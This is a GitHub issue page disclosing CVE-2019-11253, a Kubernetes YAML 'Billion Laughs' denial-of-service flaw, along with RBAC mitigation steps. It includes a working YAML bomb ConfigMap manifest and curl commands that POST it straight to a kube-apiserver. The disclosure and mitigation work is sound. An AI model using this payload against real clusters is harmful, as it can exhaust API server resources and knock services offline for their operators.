
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253

Closed

Description (by @raesene)

CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver: authorized users who send malicious YAML or JSON payloads can cause the kube-apiserver to consume excessive CPU or memory, potentially crashing it and making it unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.

Affected versions:

All four patch releases are now available.

Fixed in master by #83261

Mitigation:

Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server limits which users are able to trigger this vulnerability.

To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as rbac.yaml, and run:

kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions 

Note: this removes the ability for unauthenticated users to use kubectl auth can-i.
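
For reference, a minimal sketch of what the restrictive binding looks like (an illustration only, assuming the default role names; the attached rbac.yaml from the advisory is authoritative):

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:basic-user
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: "true"
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:basic-user
subjects:
# v1.14+ defaults bind only authenticated users; pre-v1.14 defaults also listed
# the system:unauthenticated group here, which is what the reconcile removes.
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated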

If you are running a version prior to v1.14.0:

  • in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false
  • after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true
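
One way to confirm that the binding now covers only authenticated users (a suggested check, not part of the advisory):

kubectl get clusterrolebinding system:basic-user -o jsonpath='{.subjects[*].name}'

On a mitigated or v1.14+ cluster this should print only system:authenticated.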

=============

Original description follows:

Introduction

Posting this as an issue following a report to the security list, who suggested filing it here since it is already public in a Stack Overflow question.

What happened:

When creating a ConfigMap object that contains recursive references (YAML anchors and aliases), excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack, which is well known as an XML parsing issue.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default
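
For a sense of scale, each anchor references the previous one nine times, so the expansion grows geometrically: a holds 9 strings, b expands to 9 × 9 = 81, c to 9^3 = 729, and so on, until i alone expands to 9^9 = 387,420,489 values. A manifest of well under a kilobyte therefore balloons to hundreds of millions of in-memory scalars once the aliases are resolved.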

What you expected to happen:

Ideally there would be a maximum entity size, or some limit on recursive references, in the YAML parsed by kubectl.

One note: the original poster on Stack Overflow indicated that the resource consumption was in kube-apiserver, but both tests I ran (a 1.16 client against a 1.15 kubeadm cluster, and a 1.16 client against a 1.16 kubeadm cluster) showed the CPU usage on the client side.

How to reproduce it (as minimally and precisely as possible):

Save the manifest above and apply it to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the amount of CPU time consumed.
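
One way to quantify the client-side cost (a suggestion, assuming GNU time is installed and the manifest is saved as yaml_bomb.yml):

/usr/bin/time -v kubectl create -f yaml_bomb.yml

The "User time (seconds)" and "Maximum resident set size" fields show how much CPU and memory the kubectl process itself consumed.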

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):

Test 1 (Linux AMD64 client, kubeadm cluster running in kind)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"}

Test 2 (Linux AMD64 client, kubeadm cluster running in VMware Workstation)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}

Activity

added label kind/bug on Sep 27, 2019
added label needs-sig on Sep 27, 2019
raesene (Author) commented on Sep 27, 2019

/sig cli

added label sig/cli and removed label needs-sig on Sep 27, 2019
added labels sig/api-machinery and priority/important-soon, and removed label sig/cli on Sep 27, 2019
raesene (Author) commented on Sep 27, 2019

To update based on ideas from @liggitt and @bgeesaman: it is also possible to use this issue to cause a denial of service against the kube-apiserver by using curl to POST the YAML directly to the API server, effectively bypassing the client-side processing (a direct variant without kubectl proxy is sketched after the steps below).

Steps to reproduce:

  1. Save the YAML as a file called yaml_bomb.yml.
  2. Against a valid Kubernetes cluster, run kubectl proxy.
  3. From the directory containing the saved YAML, run curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @yaml_bomb.yml
  4. If your user has rights to create ConfigMap objects in the default namespace, the request will be accepted.
  5. Observe CPU/memory usage in the API server(s) of the target cluster.
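
For reference, a sketch of the direct variant without kubectl proxy (illustrative only; $APISERVER and $TOKEN are placeholders for your API server URL and a bearer token with rights to create ConfigMaps):

# POST the YAML bomb straight to the API server, skipping all client-side parsing
curl -k -X POST "$APISERVER/api/v1/namespaces/default/configmaps" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/yaml" \
  --data-binary @yaml_bomb.yml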
changed the title from 'Kubectl YAML parsing vulnerable to "Billion Laughs" Attack.' to 'Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack.' on Sep 27, 2019
self-assigned this on Sep 27, 2019
jbeda (Contributor) commented on Sep 27, 2019

Just saw this -- we should stop accepting yaml server side. Or have a "simple yaml" variant that gets rid of references.

Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?

mauilion commented on Sep 27, 2019

Nice find!

[102 remaining activity items not shown]

PushkarJ (Member) commented on Oct 14, 2022

/label official-cve-feed

(Related to kubernetes/sig-security#1)

added label official-cve-feed on Oct 14, 2022

Metadata

Labels: area/apiserver, area/client-libraries, area/security, kind/bug, official-cve-feed, priority/critical-urgent, sig/api-machinery

Participants: @dims, @jbeda, @raesene, @anguslees, @liggitt